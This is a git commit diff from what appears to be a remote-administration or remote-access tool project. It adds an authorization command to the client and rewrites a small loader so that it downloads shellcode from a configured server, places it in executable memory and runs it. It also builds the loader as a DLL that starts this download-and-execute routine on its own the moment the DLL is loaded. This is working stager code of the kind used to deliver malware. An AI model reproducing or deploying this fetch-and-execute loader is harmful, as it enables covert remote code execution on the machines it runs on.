Improvement: Support authorize master online

2025-06-14 23:40:11 +08:00
parent f4364a4368
commit f1cf45dd3b
17 changed files with 332 additions and 37 deletions
--- a/client/ClientDll_vs2015.vcxproj
+++ b/client/ClientDll_vs2015.vcxproj
@@ -161,6 +161,7 @@
    </Link>
  </ItemDefinitionGroup>
  <ItemGroup>
+    <ClCompile Include="..\server\2015Remote\pwd_gen.cpp" />
    <ClCompile Include="Audio.cpp" />
    <ClCompile Include="AudioManager.cpp" />
    <ClCompile Include="Buffer.cpp" />
@@ -188,6 +189,7 @@
    <ClCompile Include="X264Encoder.cpp" />
  </ItemGroup>
  <ItemGroup>
+    <ClInclude Include="..\server\2015Remote\pwd_gen.h" />
    <ClInclude Include="Audio.h" />
    <ClInclude Include="AudioManager.h" />
    <ClInclude Include="Buffer.h" />
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -11,6 +11,7 @@
 #include "ClientDll.h"
 #include "MemoryModule.h"
 #include "common/dllRunner.h"
+#include "server/2015Remote/pwd_gen.h"

 //////////////////////////////////////////////////////////////////////
 // Construction/Destruction
@@ -196,6 +197,22 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)

 	switch (szBuffer[0])
 	{
+	case CMD_AUTHORIZATION: {
+		char buf[100] = {}, *passCode = buf + 5;
+		memcpy(buf, szBuffer, min(sizeof(buf), ulLength));
+		char path[MAX_PATH] = { 0 };
+		GetModuleFileNameA(NULL, path, MAX_PATH);
+		if (passCode[0] == 0) {
+			std::string devId = getDeviceID();
+			memcpy(buf + 5, devId.c_str(), devId.length());		// 16<31>ֽ<EFBFBD>
+			memcpy(buf + 32, m_conn->pwdHash, 64);				// 64<36>ֽ<EFBFBD>
+			m_ClientObject->Send2Server((char*)buf, sizeof(buf));
+		} else {
+			GET_FILEPATH(path, "settings.ini");
+			WritePrivateProfileStringA("settings", "Password", passCode, path);
+		}
+		break;
+	}
 	case CMD_EXECUTE_DLL: {
 #ifdef _WIN64
 		static std::map<std::string, std::vector<BYTE>> m_MemDLL;
--- a/client/TinyRun.vcxproj
+++ b/client/TinyRun.vcxproj
@@ -33,7 +33,7 @@
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v142</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
@@ -46,7 +46,7 @@
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v142</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
@@ -106,13 +106,13 @@
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EntryPointSymbol>mainCRTStartup</EntryPointSymbol>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@@ -135,13 +135,13 @@
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EntryPointSymbol>mainCRTStartup</EntryPointSymbol>
    </Link>
  </ItemDefinitionGroup>
  <ItemGroup>
--- a/client/ghost_vs2015.vcxproj
+++ b/client/ghost_vs2015.vcxproj
@@ -171,6 +171,7 @@
    </Link>
  </ItemDefinitionGroup>
  <ItemGroup>
+    <ClCompile Include="..\server\2015Remote\pwd_gen.cpp" />
    <ClCompile Include="Audio.cpp" />
    <ClCompile Include="AudioManager.cpp" />
    <ClCompile Include="Buffer.cpp" />
@@ -198,6 +199,7 @@
    <ClCompile Include="X264Encoder.cpp" />
  </ItemGroup>
  <ItemGroup>
+    <ClInclude Include="..\server\2015Remote\pwd_gen.h" />
    <ClInclude Include="Audio.h" />
    <ClInclude Include="AudioManager.h" />
    <ClInclude Include="Buffer.h" />
--- a/client/main.c
+++ b/client/main.c
@@ -3,6 +3,8 @@
 #include <winsock2.h>
 #include <ws2tcpip.h>
 #include <time.h>
+#include <assert.h>
+#include <stdbool.h>

 #ifdef _DEBUG
 #include <stdio.h>
@@ -165,26 +167,90 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) {
 	return NULL;
 }

+inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, int iKeySize)
+{
+	for (int i = 0; i < iBufferSize - iKeySize; ++i){
+		if (0 == memcmp(szBuffer + i, Key, iKeySize)){
+			return i;
+		}
+	}
+	return -1;
+}
+
 struct CONNECT_ADDRESS
 {
 	char	        szFlag[32];
 	char			szServerIP[100];
 	char			szPort[8];
-	char			szReserved[160];
+	int				iType;
+	bool            bEncrypt;
+	char            szBuildDate[12];
+	int             iMultiOpen;
+	int				iStartup;
+	int				iHeaderEnc;
+	char            szReserved[62];
+	char			pwdHash[64];
 }g_Server = { "Hello, World!", "127.0.0.1", "6543" };

-int main() {
+typedef struct PluginParam {
+	char IP[100];
+	int Port;
+	void* Exit;
+	void* User;
+}PluginParam;
+
+#ifdef _WINDLL
+#define DLL_API __declspec(dllexport)
+#else 
+#define DLL_API
+#endif
+
+extern DLL_API DWORD WINAPI run(LPVOID param) {
+	PluginParam* info = (PluginParam*)param;
 	int size = 0;
-	const char* dllData = ReceiveShellcode(g_Server.szServerIP, atoi(g_Server.szPort), &size);
+	const char* dllData = ReceiveShellcode(info->IP, info->Port, &size);
 	if (dllData == NULL) return -1;
 	void* execMem = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 	if (NULL == execMem) return -2;
+	char find[] = "61f04dd637a74ee34493fc1025de2c131022536da751c29e3ff4e9024d8eec43";
+	int offset = MemoryFind(dllData, find, size, sizeof(find)-1);
+	if (offset != -1) {
+		memcpy(dllData + offset, info->User, 64);
+	}
 	memcpy(execMem, dllData + 22, size);
 	free((void*)dllData);
 	DWORD oldProtect = 0;
 	if (!VirtualProtect(execMem, size, PAGE_EXECUTE_READ, &oldProtect)) return -3;

 	((void(*)())execMem)();
-	Sleep(INFINITE);
 	return 0;
 }
+
+#ifndef _WINDLL
+
+int main() {
+	assert(sizeof(struct CONNECT_ADDRESS) == 300);
+	PluginParam param = { 0 };
+	strcpy(param.IP, g_Server.szServerIP);
+	param.Port = atoi(g_Server.szPort);
+	param.User = g_Server.pwdHash;
+	DWORD result = run(&param);
+	Sleep(INFINITE);
+	return result;
+}
+
+#else
+
+BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
+{
+	if (fdwReason == DLL_PROCESS_ATTACH){
+		static PluginParam param = { 0 };
+		strcpy(param.IP, g_Server.szServerIP);
+		param.Port = atoi(g_Server.szPort);
+		param.User = g_Server.pwdHash;
+		CloseHandle(CreateThread(NULL, 0, run, &param, 0, NULL));
+	}
+	return TRUE;
+}
+
+#endif